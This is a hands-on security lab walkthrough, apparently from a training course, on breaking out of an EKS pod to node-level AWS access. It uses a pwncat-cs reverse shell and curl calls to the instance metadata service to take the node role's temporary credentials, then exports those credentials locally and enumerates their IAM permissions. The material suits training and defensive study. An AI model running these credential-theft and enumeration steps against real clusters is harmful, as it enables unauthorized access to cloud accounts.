Breakout from Pod to Node using privileged credentials

Continue using the same terminal.

Again run the pwncat-cs listener to get the reverse shell.

  • Inside eks pod, run below comands.
apt update && apt install unzip less -y
  • Install aws cli
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
./aws/install
rm -rf awscliv2.zip aws

In case exited from eks pod, exit from pwncat-cs by typing exit.

Again run the pwncat-cs listener to get the reverse shell.

Again IAM perfom Enumeration.

  • Run aws cli commands
aws sts get-caller-identity

  • To check whether using node IAM role or pod service account including IRSA & pod identity in Kubernetes.

    • Check for annotations in environment variables
    env | grep AWS_ROLE_ARN
env | grep AWS_WEB_IDENTITY_TOKEN_FILE
    • Check if the pod is using node's IAM role via IMDS V1.

    In case of IMDS V2, need to send PUT request and then send token in Header.

    curl 169.254.169.254/latest/meta-data/iam/security-credentials/
    • Verify the service account attached to the pod by checking for the annotation that links the service account to an IAM role.
    kubectl get serviceaccount <service-account-name> -o yaml
⚠️ In such a short time, do we have any other way to get the flag? 😱.
Use IMDSV2 to get the credentials and use it on local. 
echo "This can trigger guardduty and other monitoring solutions like Falco as this is suspicious command."

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")

curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE"

Exit from pod as well as from attacker's ec2 instance along with pwncat interactive shell.

Create a new file in codespace and paste the exfiltrated json data including AccessKeyId, SecretAccessKey & SessionToken.

  • Copy paste the json like object in a txt file
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
touch leaked.txt
  • Output should look like this
{
    "Credentials": {
        "AccessKeyId": "ASIAXXXXXX",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX",
        "SessionToken": "IQoJb3JpZ2luX2VjEXAMPLEXXXX...",
        "Expiration": "2024-09-30T23:59:59Z"
    }
}

Manual Steps Involved...

  • Export the temporary credentials to get the permissions of the node.
export AWS_ACCESS_KEY_ID="ASIAXXXXXX"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEXAMPLEXXXX..."
export DEFAULT_REGION="us-east-1 or us-west-2"
  • Run the aws cli command to confirm permissions.

This confirms we have got the permission of EKS nodes, confirming breakout. 

aws sts get-caller-identity
  • Enumerate IAM
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam

python3 -m pip install -r requirements.txt
  • Manually replace these values from the file and run the tool.

Make sure to update the region as per the preference.

python3 enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN --region $DEFAULT_REGION

alt text

Check there is permission to list s3 bucket.

  • Hit Ctrl+C again to force exit.

Command in case of mac.

Ctrl+C